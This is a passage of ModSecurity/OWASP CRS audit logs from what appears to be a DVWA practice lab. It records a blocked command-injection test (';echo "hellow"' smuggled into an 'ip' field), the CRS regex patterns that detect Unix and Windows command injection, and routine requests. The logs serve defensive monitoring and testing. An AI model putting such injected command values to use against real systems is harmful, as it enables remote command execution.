Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2438,"p3":0,"p4":0,"p5":199,"sr":64,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV40AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:32:22 GMT","If-None-Match":"\"1f8-54f6a5dd13646\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:35:06 GMT","ETag":"\"246-54f6a67947f4a\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1vX8AAQEAAAkVV40AAAAA\"]"],"stopwatch":{"p1":442,"p2":1043,"p3":63,"p4":147,"p5":60,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV44AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV44AAAAA\"]"],"stopwatch":{"p1":386,"p2":863,"p3":44,"p4":254,"p5":108,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV48AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV48AAAAA\"]"],"stopwatch":{"p1":340,"p2":955,"p3":44,"p4":240,"p5":51,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:12 --0400","transaction_id":"WRc2OH8AAQEAAAkW4R8AAAAB","remote_address":"127.0.0.1","remote_port":42158,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:35:06 GMT","If-None-Match":"\"246-54f6a67947f4a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:37:11 GMT","ETag":"W/\"246-54f6a6f09244d\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2OH8AAQEAAAkW4R8AAAAB\"]"],"stopwatch":{"p1":549,"p2":1260,"p3":57,"p4":146,"p5":54,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@kAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@kAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":624,"p2":2604,"p3":115,"p4":704,"p5":107,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@oAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy 